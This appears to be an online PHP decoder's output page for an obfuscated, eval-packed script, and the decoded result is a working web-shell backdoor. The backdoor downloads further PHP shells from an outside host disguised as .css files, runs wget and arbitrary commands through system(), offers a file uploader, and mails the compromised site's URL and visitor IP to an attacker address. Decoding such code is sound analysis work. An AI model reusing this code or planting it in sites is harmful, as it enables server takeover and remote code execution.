Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$x = "zUpdYqtVEn1fdv/DdTQPs7ovfNhqglP7QMxK83qDm+CXEXMvtjGGYRuDm1+/1djJa2VqrhKtIiWSFXCa6qpG..
Decoded Output download
if(isset($_REQUEST['wso1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/wso.css');
$a1=curl_exec($x1);
$f1='wso.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['idb1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/in.css');
$a1=curl_exec($x1);
$f1='idb.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['dm1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/dm.css');
$a1=curl_exec($x1);
$f1='dm.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['beiz1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/beiz.css');
$a1=curl_exec($x1);
$f1='beiz.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['whm1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/whm.css');
$a1=curl_exec($x1);
$f1='whm.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['db1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-en.php');
$a1=curl_exec($x1);
$f1='db.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['tes1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/tes.css');
$a1=curl_exec($x1);
$f1='tes.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['cp1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/cp.css');
$a1=curl_exec($x1);
$f1='cp.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['idx1'])){
$x1=curl_init();
curl_setopt($x1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x1, CURLOPT_URL,'http://elro.wap.sh/idx.css');
$a1=curl_exec($x1);
$f1='id.php';
file_put_contents($f1,$a1,FILE_APPEND);
}
if(isset($_REQUEST['4041'])){
$x2 = curl_init();
curl_setopt($x2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($x2, CURLOPT_URL,'http://elro.wap.sh/404.css');
$a2=curl_exec($x2);
$f2='4041.php';
file_put_contents($f2,$a2,FILE_APPEND);
}
if(isset($_REQUEST['el51'])){
$x1= 'wget -c www.elro.wap.sh/idb.css';
system($x1);
$x2= 'wget -c www.elro.wap.sh/jw.css';
system($x2);
$x3= 'wget -c www.elro.wap.sh/dm.css';
system($x3);
$r1= 'mv idb.css '.$_SERVER["DOCUMENT_ROOT"].'/idb.html';
system($r1);
$r2= 'mv jw.css '.$_SERVER["DOCUMENT_ROOT"].'/index_old.php';
system($r2);
$r3= 'mv dm.css '.$_SERVER["DOCUMENT_ROOT"].'/wp-inc.php';
system($r3);
}
if(isset($_REQUEST['elx'])){
$el=$_REQUEST['elx'];
system($el);
}#';
error_reporting(0);
if($_GET['el']=="ro1"){
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Gagal :v</b><br><br>'; }
else { echo '<b>Ancur</b><br><br>'; }}}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "shell1", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
Did this file decode correctly?
Original Code
$x = "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";
eval(str_rot13(gzinflate(str_rot13(base64_decode($x)))));
Function Calls
gzinflate | 1 |
str_rot13 | 4 |
base64_decode | 2 |
Stats
MD5 | 63ff091c64a9aef88ebb10fb2153d8e9 |
Eval Count | 2 |
Decode Time | 91 ms |